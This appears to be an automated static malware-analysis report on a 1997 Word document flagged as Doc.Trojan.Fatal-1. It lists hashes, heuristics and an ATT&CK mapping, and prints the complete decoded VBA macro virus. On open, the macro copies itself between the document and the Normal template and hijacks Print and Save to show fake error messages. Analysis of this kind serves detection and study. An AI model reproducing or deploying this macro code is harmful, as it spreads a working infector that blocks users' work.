Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 158c0350023154b6…

MALICIOUS

Office (OLE)

Size: 28.5 KB
Created: 1997-07-07 09:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f4d965089b9572c1659f5e4c55fa1b38
SHA-1: de981eb632e4cd065ba7da0ea738d882dd90571b
SHA-256: 158c0350023154b6ddf42c7974abced932318d3222058db5bbbcee0d5763eb5c
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to hijack the 'Print' and 'Save' commands, displaying custom error messages and potentially overwriting the document's own macros with its code. This behavior suggests an attempt to hinder analysis or user interaction with the document.

Heuristics 3

  • ClamAV: Doc.Trojan.Fatal-1 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Fatal-1
  • VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro | high | OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2022 bytes
SHA-256: 547dc19dcbe2e1567d677531a5573f96c4e09459cac6c9946e7df092f06f4b90
Detection: ClamAV: Doc.Trojan.Fatal-1
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'#WORM#
Private preventSave As Boolean
Private Sub Document_New()
preventSave = True
On Error Resume Next
Document_Open
End Sub
Private Sub WORMprint()
On Error Resume Next
MsgBox "Cannot print this document." + vbLf + "Server does not response.", vbCritical Or vbSystemModal, "Fatal error"
End Sub
Private Sub WORMsave()
On Error Resume Next
MsgBox "Cannot save this document." + vbLf + "Disk might be damaged or read protected.", vbCritical Or vbSystemModal, "Fatal error"
End Sub
Private Sub Document_Open()
On Error Resume Next
Set adoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set ntem = NormalTemplate.VBProject.VBComponents.Item(1)
CommandBars("file").Controls("Печать...").OnAction = "WORMprint"
CommandBars("standard").Controls("Печать").OnAction = "WORMprint"
CommandBars("file").Controls("Сохранить").OnAction = "WORMsave"
CommandBars("standard").Controls("Сохранить").OnAction = "WORMsave"
If adoc.CodeModule.lines(1, 1) <> "'#WORM#" Then
    BGN = 1: adoc.CodeModule.DeleteLines 1, adoc.CodeModule.CountOfLines
    Do: adoc.CodeModule.insertlines BGN, ntem.CodeModule.lines(BGN, 1)
    BGN = BGN + 1
    Loop Until ntem.CodeModule.lines(BGN, 1) = ""
    If Not preventSave Then
        If Not ActiveDocument.ReadOnly Then
            If ActiveDocument.ReadOnlyRecommended Then ActiveDocument.ReadOnlyRecommended = False
            ActiveDocument.Save
        End If
    End If
End If
If ntem.CodeModule.lines(1, 1) <> "'#WORM#" Then
    BGN = 1: ntem.CodeModule.DeleteLines 1, ntem.CodeModule.CountOfLines
    Do: ntem.CodeModule.insertlines BGN, adoc.CodeModule.lines(BGN, 1)
    BGN = BGN + 1
    Loop Until adoc.CodeModule.lines(BGN, 1) = ""
End If
preventSave = False
End Sub